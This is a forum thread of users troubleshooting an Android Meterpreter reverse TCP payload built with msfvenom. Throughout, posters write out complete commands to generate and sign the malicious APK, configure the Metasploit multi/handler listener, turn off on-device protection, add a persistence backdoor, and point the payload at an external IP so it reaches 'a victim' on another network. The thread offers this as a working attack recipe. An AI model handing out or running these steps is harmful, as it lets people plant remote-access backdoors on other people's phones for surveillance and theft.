Forum Thread: Android Doesn't Connect Back to Metasploit with App Payload?

I am trying to connect my Android device to Metasploit via reverse TCP, but it never shows up on the console. I have a Nexus 5 running NetHunter and Android 5.1.1.

The command I used was: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.124 LPORT=4444 R > base.apk

In my case, 192.168.43.124 is the attacker machine, and 4444 is the default port that Metasploit gave me. From my understanding, the phone's IP isn't important. I have tried this on multiple devices and networks and can't get it to connect.

Do I need to select architecture, or runtime?

18 Responses

If you are using an internal IP, the devices have to be in the same subnet. Otherwise, you have to set up port forwarding.

So what did you do? You connected the Android device to the network, then installed the app, and created a session in msfconsole on the attacker's machine?

Pretty much. Every tutorial I have seen just connects it all like so, and it all seems to work for them.

This might be a redundant question, but did you start a listener?

1- msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.124 LPORT=4444 R -t apk -o test.apk_

2- msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.43.124
set LPORT 4444
exploit

Now, you have 5.1.1, and with every update they might have patched something, so don't expect every exploit to work as well as on older versions. However, this is not an exploit per se and is based on a simple outgoing connection. Still, you might have an antivirus or protection software or god knows what on the newest versions (I didn't upgrade yet so I don't know), so switch any built-in or side-app security that could block suspicious connections. The things you specified you've done are correct (assuming the phone is inside the network and that you've set up the handler correctly as HXR ROFO said). Try signing the app with d2j-apk-sign if you have trouble installing it. -Ne-py

Is your phone connected to the same Wi-Fi as your PC?

Try putting your private IP in your LHOST when making the payload...

Also see if the app isn't opening on the phone or if it is being closed by some other app.

Hi, I suppose you found your way round this, but anyway I will share the solution I found for others who may read this:

1) Generate the android payload:
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.124 LPORT=4444 R > /root/base.apk

2) Sign the payload.apk:
# d2j-apk-sign -w base.apk
(This will generate base-signed.apk, change name if desired...)

3) Start Listener:
# msfconsole
> use exploit/multi/handler
> set payload android/meterpreter/reverse_tcp
> set LHOST 192.168.1.124
> exploit

4) Install apk on your phone.

Remember to delete the app (MainActivity) if the connection fails before you try again...

Even though I managed to get a connection, it seems to drop quite fast; sometimes it hardly connects and drops instantly. I suppose this depends on the device, as on another old device the connection lasts a bit longer. The only solution I found was to install a persistence script and try to gain the connection back by restarting the listener, but still I wonder if there's a way to keep the connection alive.

Here is the link from this forum where I saw the persistence script:
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/

(If the script fails delete the "--user 0" option in the script, in my case it worked, but first try as it comes...)

Hope this helps, if I find anything else I will come back to share.

The Android payload works only on the same network, but outside of the network it can't work. Any idea about this problem?
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.124 LPORT=4444 R > /root/base.apk

To make an external IP payload you must specify your external IP.

Visit dnsleaktest.com or ipchicken.com for example and copy your external IP.

Then replace your internal IP in the payload:

# msfvenom -p android/meterpreter/reverse_tcp LHOST=EXTERNAL_IP LPORT=4444 R > /root/base.apk

In addition, you could redirect the traffic from port 4444 to your internal IP in the router settings, just to make sure it arrives at your machine. I did it, but I'm not sure if we could skip this and have it still work...

EDIT: I just remembered, if you set the port 4444 on the multi/handler listener in Metasploit I really don't think you need to redirect traffic on the router settings. I will give it a try when I get some time.

Here is a nice tutorial on that:

Same here, it only gets connected while the victim is on the same network. How can I get connected to a victim who is connected to another WLAN?

The Metasploit payload for Android in Kali Linux 2017.3 doesn't work on my Redmi Note 4, and it gets stuck at "Starting payload handler". It can't hide itself. Please tell me what to do.

Same problem here. Phone is in the same network (mobile hotspot).

  • If you are using a hotspot to connect your client, then use the proxy like this: 192.168.xx.1
  • If you are using the Wi-Fi of another person who is sharing their internet with you, then use the proxy like this: 192.168.xx.100
  • Proxies can be found by using the ifconfig command.

Did anyone solve this?

I have the same problem where the handler is just sitting at:

reverse TCP handler on 0.0.0.0:4444

The app was installed correctly on the device and runs.

Both the Device and MacBook are on the same local network at home.

#Pol_Denais

I also had that problem, but there is a simple solution for it. The mistake you have made was with "LHOST". You have to set the LHOST of your listener to the same as your IPv4, otherwise it will give an error like that. To avoid getting that error again and again, you should bind your "MAC with IP" in your router's settings.

regards Al-Razi

Is it even possible to do that? I tried a lot of times.